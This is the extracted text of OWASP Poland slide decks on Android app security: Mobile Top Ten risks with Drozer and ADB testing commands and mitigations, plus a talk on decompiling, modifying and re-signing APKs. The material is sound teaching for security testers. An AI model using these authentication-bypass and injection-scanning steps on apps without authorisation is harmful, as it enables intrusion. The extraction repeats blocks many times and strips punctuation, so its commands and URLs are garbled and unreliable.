bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
